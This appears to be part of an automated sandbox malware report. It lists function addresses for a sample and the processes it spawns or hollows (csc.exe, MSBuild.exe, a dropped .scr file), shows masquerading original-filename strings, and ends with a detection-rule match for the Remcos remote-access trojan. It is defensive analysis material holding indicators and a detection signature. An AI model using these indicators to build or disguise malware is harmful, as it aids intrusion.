                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062C80_2_004062C8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162D30_2_004162D3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D2D80_2_0040D2D8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F2E00_2_0040F2E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2AC0_2_0040A2AC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162AE0_2_004162AE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040337A0_2_0040337A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D3080_2_0040D308
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D30D0_2_0040D30D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B33B0_2_0040B33B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004153C90_2_004153C9
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004113D20_2_004113D2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004133DF0_2_004133DF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D3FD0_2_0040D3FD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D3810_2_0040D381
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143900_2_00414390
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040639C0_2_0040639C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041445F0_2_0041445F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004064610_2_00406461
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004054650_2_00405465
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004144640_2_00414464
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004104660_2_00410466
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D46C0_2_0041D46C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041647A0_2_0041647A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004064000_2_00406400
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4040_2_0040B404
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004064270_2_00406427
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004134340_2_00413434
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004134C90_2_004134C9
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004134EA0_2_004134EA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004124EA0_2_004124EA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004124850_2_00412485
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004064860_2_00406486
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C4AE0_2_0041C4AE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A4B60_2_0041A4B6
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D4BA0_2_0041D4BA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004175450_2_00417545
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004135700_2_00413570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004105730_2_00410573
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040650D0_2_0040650D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004135130_2_00413513
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065210_2_00406521
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6550_2_0040B655
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041365F0_2_0041365F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004136660_2_00413666
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041360B0_2_0041360B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156D20_2_004156D2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026E40_2_004026E4
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004176860_2_00417686
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004136AE0_2_004136AE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004147470_2_00414747
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041474C0_2_0041474C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004027610_2_00402761
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041776A0_2_0041776A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B7700_2_0040B770
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F7710_2_0040F771
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137070_2_00413707
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004157140_2_00415714
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004057180_2_00405718
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004147EF0_2_004147EF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D7F10_2_0040D7F1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D7FC0_2_0040D7FC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D7A80_2_0040D7A8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B7AA0_2_0041B7AA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A8640_2_0041A864
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F8730_2_0040F873
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138720_2_00413872
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148310_2_00414831
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004108C30_2_004108C3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148ED0_2_004148ED
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148F80_2_004148F8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D8870_2_0040D887
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041488F0_2_0041488F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F89A0_2_0040F89A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049690_2_00404969
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049080_2_00404908
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F9130_2_0040F913
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004139140_2_00413914
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040491A0_2_0040491A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040492E0_2_0040492E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049350_2_00404935
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004159EC0_2_004159EC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004119F70_2_004119F7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049FD0_2_004049FD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049880_2_00404988
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004059BB0_2_004059BB
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FA6C0_2_0040FA6C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FA710_2_0040FA71
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FA100_2_0040FA10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA180_2_0040DA18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414A370_2_00414A37
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FAD80_2_0040FAD8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415AE00_2_00415AE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FAE30_2_0040FAE3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415A860_2_00415A86
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414A900_2_00414A90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414AA70_2_00414AA7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415AAE0_2_00415AAE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404ABD0_2_00404ABD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B610_2_00415B61
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B050_2_00415B05
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406B180_2_00406B18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402B180_2_00402B18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB1D0_2_0040DB1D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FB1D0_2_0040FB1D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410B3E0_2_00410B3E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404BEC0_2_00404BEC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414BEE0_2_00414BEE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404BFE0_2_00404BFE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FBA60_2_0040FBA6
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413BA70_2_00413BA7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DBBD0_2_0040DBBD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C520_2_00402C52
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404C5A0_2_00404C5A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C680_2_00402C68
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402C7D0_2_00402C7D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413C030_2_00413C03
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404C040_2_00404C04
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414C050_2_00414C05
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FC0D0_2_0040FC0D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413C120_2_00413C12
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404C1F0_2_00404C1F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CC90_2_00401CC9
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404CD80_2_00404CD8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413CEC0_2_00413CEC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404CF00_2_00404CF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414C870_2_00414C87
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414C980_2_00414C98
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415CBA0_2_00415CBA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404CBD0_2_00404CBD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405D550_2_00405D55
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404D570_2_00404D57
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401D5F0_2_00401D5F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401D670_2_00401D67
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404D700_2_00404D70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405D710_2_00405D71
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410D7F0_2_00410D7F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413D050_2_00413D05
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415D060_2_00415D06
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404D1A0_2_00404D1A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401DD50_2_00401DD5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411DDF0_2_00411DDF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401DE00_2_00401DE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404DE50_2_00404DE5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404DF40_2_00404DF4
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411DFA0_2_00411DFA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405D840_2_00405D84
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401D890_2_00401D89
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DD8C0_2_0040DD8C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405DA50_2_00405DA5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FE450_2_0040FE45
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401E670_2_00401E67
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE6C0_2_0040DE6C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE790_2_0040DE79
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404E150_2_00404E15
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041BE220_2_0041BE22
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE230_2_0040DE23
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401E360_2_00401E36
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405E380_2_00405E38
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E970_2_00413E97
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404E990_2_00404E99
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415EBF0_2_00415EBF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DF4A0_2_0040DF4A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415F530_2_00415F53
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DF770_2_0040DF77
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F7F0_2_00404F7F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405F010_2_00405F01
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CF030_2_0040CF03
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413F160_2_00413F16
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DF2B0_2_0040DF2B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406F310_2_00406F31
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CFCF0_2_0040CFCF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404FF00_2_00404FF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DF900_2_0040DF90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417F940_2_00417F94
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413FAD0_2_00413FAD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041BFBB0_2_0041BFBB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D4A782_2_052D4A78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D15B82_2_052D15B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D15C82_2_052D15C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D40692_2_052D4069
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D40982_2_052D4098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D40932_2_052D4093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_052D4A682_2_052D4A68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094B0A532_2_094B0A53
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094B15802_2_094B1580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094B1A802_2_094B1A80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094C09502_2_094C0950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094C1A082_2_094C1A08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094C0C972_2_094C0C97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D28782_2_094D2878
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DBDF02_2_094DBDF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D0CB82_2_094D0CB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D5ED02_2_094D5ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D7EF22_2_094D7EF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DB2832_2_094DB283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D52B82_2_094D52B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DBDF02_2_094DBDF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DC0AC2_2_094DC0AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D834B2_2_094D834B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094D56002_2_094D5600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_095048FE2_2_095048FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_095048862_2_09504886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09504BE82_2_09504BE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09504BA12_2_09504BA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_095082882_2_09508288
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09504D192_2_09504D19
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09504D372_2_09504D37
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF1BEE2_2_09FF1BEE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF4ED02_2_09FF4ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF1EB32_2_09FF1EB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF1E832_2_09FF1E83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF22002_2_09FF2200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF14132_2_09FF1413
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF19102_2_09FF1910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF18AC2_2_09FF18AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF1A802_2_09FF1A80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF21D02_2_09FF21D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF24CA2_2_09FF24CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF265D2_2_09FF265D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_09FF16402_2_09FF1640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D0714_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004520D24_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043D0984_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004371504_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004361AA4_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004262544_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004313774_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043651C4_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041E5DF4_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0044C7394_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004367C64_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004267CB4_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043C9DD4_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00432A494_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00436A8D4_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043CC0C4_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00436D484_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00434D224_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00426E734_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00440E204_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043CE3B4_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00412F454_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00452F004_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00426FAD4_2_00426FAD
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_0040497C5_2_0040497C
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00406ED25_2_00406ED2
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_004074BB5_2_004074BB
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A209723_2_001A2097
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A80C723_2_001A80C7
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001821FD23_2_001821FD
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001BA30E23_2_001BA30E
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A235223_2_001A2352
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0019C45C23_2_0019C45C
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0020C5C423_2_0020C5C4
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F28D723_2_001F28D7
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001BE92023_2_001BE920
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E8AB423_2_001E8AB4
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001B6B8B23_2_001B6B8B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0019CBB223_2_0019CBB2
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001ACEC023_2_001ACEC0
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_00214F4F23_2_00214F4F
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0018D00023_2_0018D000
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001B71F923_2_001B71F9
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0018954023_2_00189540
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A17B423_2_001A17B4
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_00189A2023_2_00189A20
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A1B2623_2_001A1B26
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A7C3B23_2_001A7C3B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A1DD023_2_001A1DD0
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A7E6A23_2_001A7E6A
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_00189E8023_2_00189E80
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0019DF7823_2_0019DF78
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00402D89 appears 65 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00437C80 appears 114 times
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: String function: 001A0E50 appears 46 times
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: String function: 0019FE52 appears 39 times
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: String function: 004062A3 appears 57 times
                    Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                    Source: file.exe, 00000000.00000002.2266529218.00000000022B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVjzqimy.exe" vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameQuickTextPaste.exe( vs file.exe
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
